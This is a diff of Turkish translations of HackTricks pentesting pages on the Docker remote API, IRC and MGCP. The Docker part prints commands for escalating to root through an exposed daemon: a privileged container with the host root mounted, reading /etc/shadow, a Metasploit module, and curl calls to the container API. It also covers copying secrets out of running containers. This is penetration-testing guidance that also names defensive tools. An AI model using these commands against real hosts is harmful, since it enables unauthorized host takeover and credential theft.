@ -89,15 +89,15 @@ ctr container delete <containerName>
|
|||
```
|
||||
#### Podman
|
||||
|
||||
**Podman**, Red Hat tarafından geliştirilen ve sürdürülen [Açık Konteyner İnisiyatifi (OCI) standartlarına](https://github.com/opencontainers) uygun olan açık kaynaklı bir konteyner motorudur. Docker'dan farklı olarak, **daemonless mimarisi** ve **rootless konteynerler** desteği gibi belirgin özelliklere sahiptir, bu sayede kullanıcıların kök ayrıcalıkları olmadan konteyner çalıştırmasına olanak tanır.
|
||||
**Podman**, Red Hat tarafından geliştirilen ve sürdürülen [Açık Konteyner İnisiyatifi (OCI) standartlarına](https://github.com/opencontainers) uygun olan açık kaynaklı bir konteyner motorudur. Docker'dan farklı olarak **daemonless mimarisi** ve **rootless konteyner** desteği ile dikkat çeker, kullanıcılara kök ayrıcalıkları olmadan konteyner çalıştırma imkanı sağlar.
|
||||
|
||||
Podman, Docker'ın API'si ile uyumlu olacak şekilde tasarlanmıştır, bu da Docker CLI komutlarının kullanılmasına olanak tanır. Bu uyumluluk, **Buildah** gibi konteyner görüntüleri oluşturmak için araçlar ve itme, çekme ve inceleme gibi görüntü işlemleri için **Skopeo** gibi araçları içeren ekosistemi de kapsar. Bu araçlar hakkında daha fazla ayrıntıya [GitHub sayfalarında](https://github.com/containers/buildah/tree/master/docs/containertools) ulaşılabilir.
|
||||
Podman, Docker'ın API'si ile uyumlu olacak şekilde tasarlanmıştır, Docker CLI komutlarının kullanımına izin verir. Bu uyumluluk, **Buildah** gibi konteyner görüntüleri oluşturmak için ve **Skopeo** gibi görüntü işlemleri için kullanılan araçları içeren ekosistemi de kapsar. Bu araçlar hakkında daha fazla bilgi [GitHub sayfalarında](https://github.com/containers/buildah/tree/master/docs/containertools) bulunabilir.
|
||||
|
||||
**Ana Farklar**
|
||||
|
||||
* **Mimari**: Arkaplan daemonu olmadan çalışan Podman, Docker'ın istemci-sunucu modelinden farklı olarak çalışır. Bu tasarım, konteynerlerin başlatan kullanıcının ayrıcalıklarıyla çalışmasını sağlar ve kök erişimi gereksinimini ortadan kaldırarak güvenliği artırır.
|
||||
* **Systemd Entegrasyonu**: Podman, konteynerleri yönetmek için **systemd** ile entegre olur ve systemd birimleri aracılığıyla konteyner yönetimine olanak tanır. Bu, Docker'ın systemd'i genellikle Docker daemon işlemini yönetmek için kullandığından farklıdır.
|
||||
* **Rootless Konteynerler**: Podman'ın önemli bir özelliği, konteynerleri başlatan kullanıcının ayrıcalıkları altında çalıştırabilme yeteneğidir. Bu yaklaşım, saldırganların yalnızca tehlikeye atılan kullanıcının ayrıcalıklarını değil kök erişimini elde etmelerini sağlayarak konteyner ihlalleri ile ilişkili riskleri en aza indirir.
|
||||
* **Mimari**: Arkaplan daemonu olmadan çalışan Podman, Docker'ın istemci-sunucu modelinden farklı olarak çalışır. Bu tasarım, konteynerlerin başlatan kullanıcının ayrıcalıklarıyla çalışmasını sağlar ve kök erişimine gerek olmadan güvenliği artırır.
|
||||
* **Systemd Entegrasyonu**: Podman, konteynerleri yönetmek için **systemd** ile entegre olur, systemd birimleri aracılığıyla konteyner yönetimine olanak tanır. Bu, Docker'ın systemd'i genellikle Docker daemon işlemini yönetmek için kullandığından farklıdır.
|
||||
* **Rootless Konteynerler**: Podman'ın önemli bir özelliği, konteynerleri başlatan kullanıcının ayrıcalıkları altında çalıştırabilme yeteneğidir. Bu yaklaşım, saldırganların sadece tehlikeye atılan kullanıcının ayrıcalıklarını değil kök erişimini elde etmelerini sağlayarak konteyner ihlalleri ile ilişkili riskleri en aza indirir.
|
||||
|
||||
Podman'ın yaklaşımı, kullanıcı ayrıcalık yönetimine ve mevcut Docker iş akışlarıyla uyumluluğa vurgu yaparak güvenli ve esnek bir Docker alternatifi sunar.
|
||||
|
||||
|
@ -113,7 +113,7 @@ podman ls
|
|||
|
||||
### Temel Bilgiler
|
||||
|
||||
Uzak API varsayılan olarak 2375 bağlantı noktasında çalışırken etkinleştirildiğinde. Hizmet varsayılan olarak kimlik doğrulama gerektirmeyecektir, bu da bir saldırganın ayrıcalıklı bir docker konteyneri başlatmasına olanak tanır. Uzak API kullanılarak bir kişi, ana bilgisayarın ortamının dosyalarını okuyup/yazabilir ve ana bilgisayarları / (kök dizini) konteynere bağlayabilir.
|
||||
Uzak API varsayılan olarak 2375 bağlantı noktasında çalışırken etkinleştirildiğinde. Hizmet varsayılan olarak kimlik doğrulama gerektirmeyecektir, bu da bir saldırganın ayrıcalıklı bir docker konteyneri başlatmasına olanak tanır. Uzak API kullanılarak bir kişi, ana bilgisayarın ortamındaki dosyaları okuyup/yazarak ana bilgisayarlarına (kök dizin) bağlayabilir.
|
||||
|
||||
**Varsayılan bağlantı noktası:** 2375
|
||||
```
|
||||
|
@ -160,10 +160,10 @@ docker-init:
|
|||
Version: 0.18.0
|
||||
GitCommit: fec3683
|
||||
```
|
||||
Eğer **docker** komutu ile **uzak docker API'sine bağlanabilirseniz**, hizmetle etkileşimde bulunmak için önceden yorumlanmış **docker** [**komutlarını** çalıştırabilirsiniz](2375-pentesting-docker.md#basic-commands).
|
||||
Eğer **docker** komutu ile **uzak docker API'sine bağlanabilirseniz**, hizmetle etkileşimde bulunmak için önceden yorumlanmış olan **docker** [**komutlarını** çalıştırabilirsiniz](2375-pentesting-docker.md#basic-commands).
|
||||
|
||||
{% hint style="info" %}
|
||||
`export DOCKER_HOST="tcp://localhost:2375"` yapabilir ve **docker** komutunda `-H` parametresini kullanmaktan **kaçınabilirsiniz**
|
||||
`DOCKER_HOST="tcp://localhost:2375"`'i **dışa aktarabilir** ve docker komutunda `-H` parametresini kullanmaktan **kaçınabilirsiniz**
|
||||
{% endhint %}
|
||||
|
||||
**Hızlı ayrıcalık yükseltme**
|
||||
|
@ -172,7 +172,7 @@ docker run -it -v /:/host/ ubuntu:latest chroot /host/ bash
|
|||
```
|
||||
**Curl**
|
||||
|
||||
Bazen **2376**'yı **TLS** uç noktası için görebilirsiniz. Docker istemcisi ile bağlantı kuramadım ancak curl ile yapmak mümkün.
|
||||
Bazen **2376**'yı **TLS** uç noktası için görebilirsiniz. Docker istemcisi ile bağlantı kuramadım ama curl ile yapmak mümkün.
|
||||
```bash
|
||||
#List containers
|
||||
curl –insecure https://tlsopen.docker.socket:2376/containers/json | jq
|
||||
|
@ -202,22 +202,22 @@ curl –insecure -vv -X POST -H "Content-Type: application/json" https://tls-ope
|
|||
#Delete stopped containers
|
||||
curl –insecure -vv -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/prune
|
||||
```
|
||||
Eğer bununla ilgili daha fazla bilgi istiyorsan, komutları kopyaladığım yerde daha fazla bilgi bulunabilir: [https://securityboulevard.com/2019/02/abusing-docker-api-socket/](https://securityboulevard.com/2019/02/abusing-docker-api-socket/)
|
||||
|
||||
#### Otomatik
|
||||
|
||||
Bu konu hakkında daha fazla bilgi isterseniz, komutları kopyaladığım yerde daha fazla bilgi bulunmaktadır: [https://securityboulevard.com/2019/02/abusing-docker-api-socket/](https://securityboulevard.com/2019/02/abusing-docker-api-socket/)
|
||||
```bash
|
||||
msf> use exploit/linux/http/docker_daemon_tcp
|
||||
nmap -sV --script "docker-*" -p <PORT> <IP>
|
||||
```
|
||||
### Kompromis
|
||||
|
||||
Aşağıdaki sayfada bir docker konteynerinden kaçmanın yollarını bulabilirsiniz:
|
||||
Aşağıdaki sayfada bir **docker konteynerinden kaçmanın** yollarını bulabilirsiniz:
|
||||
|
||||
{% content-ref url="../linux-hardening/privilege-escalation/docker-security/" %}
|
||||
[docker-security](../linux-hardening/privilege-escalation/docker-security/)
|
||||
{% endcontent-ref %}
|
||||
|
||||
Bunu istismar ederek bir konteynerden kaçmak mümkündür, zayıf bir konteyneri uzaktaki makinede çalıştırabilir, ondan kaçabilir ve makineyi tehlikeye atabilirsiniz:
|
||||
Bunu istismar ederek bir konteynerden kaçmak mümkündür, uzaktaki makinede zayıf bir konteyner çalıştırabilir, ondan kaçabilir ve makineyi tehlikeye atabilirsiniz:
|
||||
```bash
|
||||
docker -H <host>:2375 run --rm -it --privileged --net=host -v /:/mnt alpine
|
||||
cat /mnt/etc/shadow
|
||||
|
@ -226,14 +226,14 @@ cat /mnt/etc/shadow
|
|||
|
||||
### Yetki Yükseltme
|
||||
|
||||
Eğer bir docker kullanan bir ana bilgisayarın içindeyseniz, [**yetkileri yükseltmeyi denemek için bu bilgileri okuyabilirsiniz**](../linux-hardening/privilege-escalation/#writable-docker-socket).
|
||||
Eğer bir docker kullanan bir ana makinedeyseniz, [**yetkileri yükseltmeye çalışmak için bu bilgileri okuyabilirsiniz**](../linux-hardening/privilege-escalation/#writable-docker-socket).
|
||||
|
||||
### Çalışan Docker konteynerlerinde sırları keşfetmek
|
||||
```bash
|
||||
docker ps [| grep <kubernetes_service_name>]
|
||||
docker inspect <docker_id>
|
||||
```
|
||||
**env** (çevresel değişken bölümünü) sızıntılar için kontrol edin ve şunları bulabilirsiniz:
|
||||
**env** (çevresel değişken bölümünü) sırlar için kontrol edin ve şunları bulabilirsiniz:
|
||||
|
||||
* Parolalar.
|
||||
* IP'ler.
|
||||
|
@ -247,7 +247,7 @@ docker cp <docket_id>:/etc/<secret_01> <secret_01>
|
|||
```
|
||||
### Docker'ınızı Güvence Altına Alma
|
||||
|
||||
#### Docker Kurulumunuzu ve Kullanımınızı Güvence Altına Alma
|
||||
#### Docker Kurulumunuzu ve Kullanımınızı Güvenceye Alma
|
||||
|
||||
* Mevcut Docker kurulumunuzu incelemek için [https://github.com/docker/docker-bench-security](https://github.com/docker/docker-bench-security) aracını kullanabilirsiniz.
|
||||
* `./docker-bench-security.sh`
|
||||
|
@ -258,15 +258,15 @@ docker cp <docket_id>:/etc/<secret_01> <secret_01>
|
|||
* `docker run --rm -it --pid host r.j3ss.co/amicontained`
|
||||
* `docker run --rm -it --security-opt "apparmor=unconfined" r.j3ss.co/amicontained`
|
||||
|
||||
#### Docker Görüntülerini Güvence Altına Alma
|
||||
#### Docker Görüntülerini Güvenceye Alma
|
||||
|
||||
* Diğer Docker görüntülerinizi tarayarak güvenlik açıklarını bulmak için [https://github.com/quay/clair](https://github.com/quay/clair) adlı bir Docker görüntüsü kullanabilirsiniz.
|
||||
* `docker run --rm -v /root/clair_config/:/config -p 6060-6061:6060-6061 -d clair -config="/config/config.yaml"`
|
||||
* `clair-scanner -c http://172.17.0.3:6060 --ip 172.17.0.1 ubuntu-image`
|
||||
|
||||
#### Docker Dosyalarını Güvence Altına Alma
|
||||
#### Docker Dosyalarını Güvenceye Alma
|
||||
|
||||
* Docker dosyanızı incelemek ve tüm türden yan yapılandırmaları bulmak için [https://github.com/buddy-works/dockerfile-linter](https://github.com/buddy-works/dockerfile-linter) aracını kullanabilirsiniz. Her yan yapılandırmaya bir kimlik verilecek ve her birini nasıl düzelteceğinizi [https://github.com/buddy-works/dockerfile-linter/blob/master/Rules.md](https://github.com/buddy-works/dockerfile-linter/blob/master/Rules.md) buradan bulabilirsiniz.
|
||||
* Docker dosyanızı incelemek ve tüm türden yan yapılandırmaları bulmak için [https://github.com/buddy-works/dockerfile-linter](https://github.com/buddy-works/dockerfile-linter) aracını kullanabilirsiniz. Her yan yapılandırmaya bir kimlik verilir, her birini nasıl düzelteceğinizi [https://github.com/buddy-works/dockerfile-linter/blob/master/Rules.md](https://github.com/buddy-works/dockerfile-linter/blob/master/Rules.md) adresinden bulabilirsiniz.
|
||||
* `dockerfilelinter -f Dockerfile`
|
||||
|
||||
![](<../.gitbook/assets/image (173).png>)
|
||||
|
@ -289,7 +289,7 @@ docker cp <docket_id>:/etc/<secret_01> <secret_01>
|
|||
#### Şüpheli Etkinlikleri Günlüğe Kaydetme
|
||||
|
||||
* Çalışan konteynerlerdeki **şüpheli davranışları** tespit etmek için [https://github.com/falcosecurity/falco](https://github.com/falcosecurity/falco) aracını kullanabilirsiniz.
|
||||
* Aşağıdaki parçada **Falco'nun bir çekirdek modülü derlediğini ve eklediğini** görebilirsiniz. Bundan sonra, kuralları yükler ve **şüpheli etkinlikleri kaydetmeye başlar**. Bu durumda, başlatılan 2 ayrıcalıklı konteyner tespit edildi, bunlardan biri hassas bir bağlantı noktasıyla ve birkaç saniye sonra konteynerlerden birinde bir kabuk açıldığı tespit edildi.
|
||||
* Aşağıdaki parçada **Falco'nun bir çekirdek modülü derlediğini ve eklediğini** görebilirsiniz. Bundan sonra kuralları yükler ve **şüpheli etkinlikleri kaydetmeye başlar**. Bu durumda, 2 ayrıcalıklı konteynerin başlatıldığını, bunlardan birinin hassas bir bağlantı noktasıyla başlatıldığını ve birkaç saniye sonra bir konteynerin içinde bir kabuğun açıldığını tespit etmiştir.
|
||||
```bash
|
||||
docker run -it --privileged -v /var/run/docker.sock:/host/var/run/docker.sock -v /dev:/host/dev -v /proc:/host/proc:ro -v /boot:/host/boot:ro -v /lib/modules:/host/lib/modules:ro -v /usr:/host/usr:ro falco
|
||||
* Setting up /usr/src links from host
|
||||
|
@ -340,13 +340,13 @@ Docker'ı izlemek için auditd kullanabilirsiniz.
|
|||
* [https://stackoverflow.com/questions/41645665/how-containerd-compares-to-runc](https://stackoverflow.com/questions/41645665/how-containerd-compares-to-runc)
|
||||
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io), şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **tehlikeye atılıp atılmadığını** kontrol etmek için **ücretsiz** işlevler sunan **dark web** destekli bir arama motorudur.
|
||||
[**WhiteIntel**](https://whiteintel.io), şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **tehlikeye atılıp atılmadığını** kontrol etmek için **ücretsiz** işlevler sunan **dark-web** destekli bir arama motorudur.
|
||||
|
||||
WhiteIntel'in asıl amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye saldırılarıyla mücadele etmektir.
|
||||
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
|
||||
|
||||
Websitesini ziyaret edebilir ve **ücretsiz** olarak motorlarını deneyebilirsiniz:
|
||||
|
||||
|
@ -355,14 +355,14 @@ Websitesini ziyaret edebilir ve **ücretsiz** olarak motorlarını deneyebilirsi
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Sıfırdan kahraman olmak için AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>AWS hacklemeyi sıfırdan kahraman seviyesine öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
HackTricks'i desteklemenin diğer yolları:
|
||||
|
||||
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
|
||||
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
|
||||
* **💬 [Discord grubuna](https://discord.gg/hRep4RUj7f) katılın veya [telegram grubuna](https://t.me/peass) katılın veya bizi Twitter'da takip edin** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın veya** bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**'da takip edin.**
|
||||
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -6,23 +6,23 @@
|
|||
|
||||
HackTricks'ı desteklemenin diğer yolları:
|
||||
|
||||
* **Şirketinizi HackTricks'te reklamınızı görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na göz atın (https://github.com/sponsors/carlospolop)!
|
||||
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na göz atın (https://github.com/sponsors/carlospolop)!
|
||||
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
|
||||
* [**The PEASS Family**]'yi (https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**]'i (https://opensea.io/collection/the-peass-family) içeren koleksiyonumuz
|
||||
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)'da **takip edin**.
|
||||
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
|
||||
* [**The PEASS Family**]'yi keşfedin (https://opensea.io/collection/the-peass-family), özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
|
||||
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)** takip edin.**
|
||||
* **Hacking püf noktalarınızı paylaşarak PR göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io), **karanlık ağ** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunar.
|
||||
[**WhiteIntel**](https://whiteintel.io), **karanlık web** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunar.
|
||||
|
||||
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye saldırılarıyla mücadele etmektir.
|
||||
|
||||
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
||||
Websitesini ziyaret edebilir ve **ücretsiz** olarak motorlarını deneyebilirsiniz:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
@ -30,7 +30,7 @@ Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
|||
|
||||
## Temel Bilgiler
|
||||
|
||||
IRC, başlangıçta **düz metin protokolü** olarak tanımlandı ve IANA tarafından **194/TCP** olarak atanmasına rağmen genellikle **root ayrıcalıklarına ihtiyaç duymamak** için **6667/TCP** ve benzeri bağlantı noktalarında çalıştırılır.
|
||||
IRC, başlangıçta **düz metin protokolü** olarak tanımlandı ve IANA tarafından **194/TCP** olarak atanmış olsa da genellikle işlem için **root ayrıcalıklarına ihtiyaç duymamak için** **6667/TCP** ve benzeri bağlantı noktalarında çalıştırılır.
|
||||
|
||||
Bir sunucuya bağlanmak için bir **rumuz** yeterlidir. Bağlantıdan sonra sunucu, kullanıcının IP'si üzerinde ters-DNS araması yapar.
|
||||
|
||||
|
@ -52,7 +52,7 @@ openssl s_client -connect <IP>:<PORT> -quiet
|
|||
```
|
||||
### Kılavuz
|
||||
|
||||
Burada, **rastgele takma adı** kullanarak IRC'ye nasıl bağlanıp erişebileceğinizi ve ardından bazı ilginç bilgileri nasıl sıralayabileceğinizi görebilirsiniz. IRC'nin daha fazla komutunu [buradan](https://en.wikipedia.org/wiki/List\_of\_Internet\_Relay\_Chat\_commands#USERIP) öğrenebilirsiniz.
|
||||
Burada, **rastgele takma ad** kullanarak IRC'ye nasıl bağlanıp erişebileceğinizi ve ardından bazı ilginç bilgileri nasıl sıralayabileceğinizi görebilirsiniz. IRC'nin daha fazla komutunu [buradan](https://en.wikipedia.org/wiki/List\_of\_Internet\_Relay\_Chat\_commands#USERIP) öğrenebilirsiniz.
|
||||
```bash
|
||||
#Connection with random nickname
|
||||
USER ran213eqdw123 0 * ran213eqdw123
|
||||
|
@ -97,16 +97,15 @@ nmap -sV --script irc-botnet-channels,irc-info,irc-unrealircd-backdoor -p 194,66
|
|||
|
||||
* `ana bilgisayar adınızı arıyor`
|
||||
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
## WhiteIntel
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io), şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **tehlikeye atılıp atılmadığını** kontrol etmek için **ücretsiz** işlevler sunan **karanlık ağ** destekli bir arama motorudur.
|
||||
|
||||
WhiteIntel'in asıl amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye saldırılarıyla mücadele etmektir.
|
||||
|
||||
Websitesini ziyaret edebilir ve **ücretsiz** olarak motorlarını deneyebilirsiniz:
|
||||
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
@ -114,12 +113,12 @@ Websitesini ziyaret edebilir ve **ücretsiz** olarak motorlarını deneyebilirsi
|
|||
|
||||
<summary><strong>Sıfırdan kahraman olmak için AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
HackTricks'i desteklemenin diğer yolları:
|
||||
HackTricks' i desteklemenin diğer yolları:
|
||||
|
||||
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
|
||||
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
|
||||
* [**The PEASS Family'yi**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
|
||||
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi Twitter'da takip edin 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
|
||||
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi Twitter'da** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)** takip edin.**
|
||||
* **Hacking püf noktalarınızı paylaşarak PR'ler göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -2,25 +2,25 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>AWS hackleme konusunda sıfırdan kahramana kadar öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> ile!</strong></summary>
|
||||
<summary><strong>AWS hacklemeyi sıfırdan kahramana öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> ile!</strong></summary>
|
||||
|
||||
HackTricks'ı desteklemenin diğer yolları:
|
||||
|
||||
* **Şirketinizi HackTricks'te reklam görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
|
||||
* **Şirketinizi HackTricks'te reklam görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
|
||||
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
|
||||
* [**The PEASS Family'yi**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
|
||||
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)** takip edin.**
|
||||
* **Hacking püf noktalarınızı paylaşarak** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına PR göndererek destek olun.
|
||||
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya **bizi** Twitter'da 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)** takip edin.**
|
||||
* **Hacking püf noktalarınızı paylaşarak PR göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io), şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunan **dark-web** destekli bir arama motorudur.
|
||||
[**WhiteIntel**](https://whiteintel.io), şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini kontrol etmek için ücretsiz** işlevsellikler sunan **dark-web** destekli bir arama motorudur.
|
||||
|
||||
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
|
||||
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye saldırılarıyla mücadele etmektir.
|
||||
|
||||
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
||||
|
||||
|
@ -42,7 +42,7 @@ Bu endüstri standardıdır, daha fazla bilgi için kontrol edin:
|
|||
|
||||
MGCP (Media Gateway Control Protocol), RFC 3435'te belirtilen bir **sinyal** ve **arama** **kontrol protokolü**dür. Üç ana bileşenden oluşan merkezi bir mimaride çalışır:
|
||||
|
||||
1. **Çağrı Yönlendirici veya Medya Ağ Gezgini Denetleyicisi (MGC)**: MGCP mimarisindeki ana ağ geçidi, medya ağ geçitlerini **yönetme ve kontrol etme**den sorumludur. Çağrı kurulumu, değişiklik ve sonlandırma işlemlerini yönetir. MGC, medya ağ geçitleriyle MGCP protokolünü kullanarak iletişim kurar.
|
||||
1. **Çağrı Yönlendirici veya Medya Ağ Gezgini Denetleyicisi (MGC)**: MGCP mimarisindeki ana ağ geçidi, **medya ağ geçitlerini yönetmek ve kontrol etmekten sorumludur**. Çağrı kurulumu, değişiklik ve sonlandırma işlemlerini yönetir. MGC, medya ağ geçitleriyle MGCP protokolünü kullanarak iletişim kurar.
|
||||
2. **Medya Ağ Geçitleri (MGs) veya Köle Ağ Geçitleri**: Bu cihazlar, farklı ağlar arasında dijital medya akışlarını dönüştürür, geleneksel devre anahtarlamalı telefonculuk ve paket anahtarlamalı IP ağları gibi. MGC tarafından yönetilir ve ondan aldığı komutları uygular. Medya ağ geçitleri, transkodlama, paketleme ve yankı iptali gibi işlevleri içerebilir.
|
||||
3. **Sinyal Ağ Geçitleri (SG'ler)**: Bu ağ geçitleri, farklı ağlar arasında sinyal mesajlarını dönüştürmekten sorumludur, geleneksel telefonculuk sistemleri (örneğin, SS7) ile IP tabanlı ağlar (örneğin, SIP veya H.323) arasında sorunsuz iletişimi sağlar. Sinyal ağ geçitleri, farklı ağlar arasında çağrı kontrol bilgilerinin doğru iletilmesini sağlamak için önemlidir.
|
||||
|
||||
|
